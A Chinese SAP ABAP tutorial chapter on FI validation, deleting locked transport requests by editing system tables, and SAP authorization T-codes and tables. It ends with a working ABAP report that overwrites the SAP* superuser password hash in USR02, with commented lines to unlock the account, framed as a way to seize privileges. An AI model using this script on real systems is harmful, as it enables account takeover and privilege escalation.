三个月精通ABAP(7)

5. 预制凭证可使用退代吗 ?

这个问题就好比去问一个人是否有双眉毛一样?答案是一般天生是没有,如去整容院整就能有. SAP标准程序是不允许预制凭证有退代的,其实也没必要,因为预制凭证本来就不是正式凭证,比如posting date就算现在根据某种规则退代了,等真正posting时还不是要根据正常凭证的规则去post ,这不多此一举.

如果真需为预制设置退代,也很容易.请看下面分解.

(1)使用/H启动debug,按F6直到执行到SAPMF05A screen Number 1001,在module document_merge设置断点,这个module是判断是否有退代的入口.

(2)parked doc g_status =2 .

如下图加入代码,则退代对FV50预制凭证生效.

FI_VALIDATION_DOC

FI_VALIDATION_HEADER

FI_VALIDATION_ITEM

6. 物料凭证可使用退代和确定吗?

如果Mat doc产生的同时产生了财务凭证当然可以使用.

4.BKPF|BSEG浅析

5.Dunning催款

6.支票打印

7.

8.

5.CO模块开发实例.

1.

2.

8.

6.Basis相关开发实例

1.删除传输请求

关于传输请求在第二章13节已经有详细说明,下面是一个关于如何删除被锁的传输请求的程序,读者可根据实际情况补充.

通常对锁住的表对象可采用SM12解锁,对传输请求可按下面程序处理.

Program ZSTDELREQ .

data :

itab_e070 like e070 occurs 0 with header line,

* Request header including Req user.

iwa_e070c like e070c, "Request client

itab_e071 like e071 occurs 0 with header line ,

*Request entry line items may include multiple lines

iwa_e07t like e07t , "Requst short text(desc)

iwa_E070A like E070A ,

*If the Request was locked and delelted,Delete Tlock otherwise

*The program will be locked to make any modifications.

itab_tlock like tlock occurs 0 with header line .

parameter reqno like e070-trkorr default '' .

select * into table itab_e070 from e070

where trkorr eq reqno or strkorr eq reqno.

if SY-SUBRC Ne 0 .

write : 'The Request No.:' , Reqno , ' not exist !' .

* exit .

endif .

select single * into iwa_e070c from e070c

where trkorr eq reqno .

select * into table itab_e071 from e071

where trkorr eq reqno .

select single * into iwa_e07t from e07t

where trkorr eq reqno .

select single * into iwa_E070A from e070A

where trkorr eq reqno .

if itab_e070 IS INITIAL .

select * into table itab_tlock from tlock

where trkorr eq reqno .

else.

select * into table itab_tlock from tlock

FOR ALL ENTRIES IN itab_e070

where TRKORR eq itab_e070-trkorr .

endif.

if SY-SUBRC NE 0 .

write : / 'No Locked object for the request NO. was found!'.

endif .

delete :

e070 from table itab_e070 ,

e070c from iwa_e070c,

e071 from table itab_e071,

e07t from iwa_e07t ,

e070A from iwa_E070A ,

tlock from table itab_tlock .

write : / 'The Request No.:' , Reqno ,

' has already been successfully Full deleted'.

如果开发的程序被包含在$TMP package中,现在想传输到QAS或PRD,需要改换package,一个简单的方法就是将记录从资源库对象目录TADIR表中将记录删除(程序如下),接下来改变保存激活程序就会重新弹出Create Object Directory Entry的窗口.

Report zdelpackage.

data iwa_tadir like tadir .

select single * into iwa_tadir from tadir

where OBJ_NAME = 'ZXMBCU02'."change to your prog. Name.

delete tadir from iwa_tadir.

2.检测用户授权列表

3.致命SAP权限控制漏洞

尽管SAP系统提供了非常完善的权限控制机制,甚至允许细到字段级和允许用户自定义授权对象,然后SAP权限控制漏洞也是致命的,随便一个小程序就可轻易获取权限

作为职业程序员,对取得权限大多会有一定兴趣(这点催生了一批无聊的所谓Hacker).

读者可自行理解下面几个概,在此不再细述.

[1].Activity(group)

[2].Authorization Object

[3].Profile

[4].Role

实际上决定权限的是Authorization Object , 看USR_USER_AUTH_FOR_OBJ_GET

和AUTHORIZATION_DATA_READ_SELOBJ函数就知道了.

常用权限相关Tcode .

(一)Role(角色)相关T-code:

PFAC 标准

PFAC_CHG 改变

PFAC_DEL 删除

PFAC_DIS 显示

PFAC_INS 新建

PFAC_STR

PFCG 创建

ROLE_CMP 比较

SUPC 批量建立角色profile

SWUJ 测试

SU03 检测授权

SU25, SU26 检查Profile

(二)建立用户

SU0

SU01

SU01D

SU01_NAV

SU05

SU1

SU10 批量

SU12 批量

SUCOMP:维护用户公司地址

SU2 change用户参数

SUIM 用户信息系统,可by 多个查询.

(三)建立用户组

SUGR:维护

SUGRD:显示

SUGRD_NAV:还是维护

SUGR_NAV:还是显示

(四)维护检查授权

SU20|SU21:如有特殊需要定义自己的authorization fields

SU50|SU51|SU52

SU53:当有权限问题可使用它检测

SU56:分析authoraztion data buffers.
SU87:用来检查用户改变产生的history
SU96,SU97,SU98,SU99:

常用权限相关表格:

TOBJ : All avaiable authorzation objects.(SAP default objects全在此)

USR12: 用户级authoraztion值

USR02:密码table

USR04:Authorization

USR03:User address data

USR05:User Master Parameter ID

USR06:Additional Data per User

USR07:Object/values of last authorization check that failed

USR08:Table for user menu entries

USR09:Entries for user menus (work areas)

USR10:User master authorization profiles

USR11:User Master Texts for Profiles (USR10)

USR12:User master authorization values

USR13:Short Texts for Authorizations

USR14:Surchargeable Language Versions per User

USR15:External User Name

USR16:Values for Variables for User Authorizations

USR20:Date of last user master reorganization

USR21:Assign user name address key

USR22:Logon data without kernel access

USR30:Additional Information for User Menu

USR40:Table for illegal passwords

USR41:当前用户(SM04看到的所有当前活动用户)

USRBF2:记录当前用户所有的授权objects

UST04:User Profile master

UST10C: Composite profiles

UST10S: Single profiles

UST12 : Authorizations

如何获取权限呢?下面举几个实际例子

修改某权限大的用户密码.下面是直接修改SAP*的密码为123.就一句话足矣.

report ZMODPWD.

tables :usr02 .

*Data ZUSR02 like USR02 .

*select single * into zUSR02 from USR02

*where BNAME = 'SAP*'.

*ZUSR02-BNAME = 'SAP*'.

*ZUSR02-Bcode = '9C8AB8600E74D864' .

*ZUSR02-UFLAG = '0' ."unlock SAP*

*Update USR02 from ZUSR02 .

update usr02 set bcode = 'DF52478E6FF90EEB'

where BNAME = 'SAP*'.

就是说通过上面的程序轻易将sap*的密码给修改了.加密算法在此彻底失效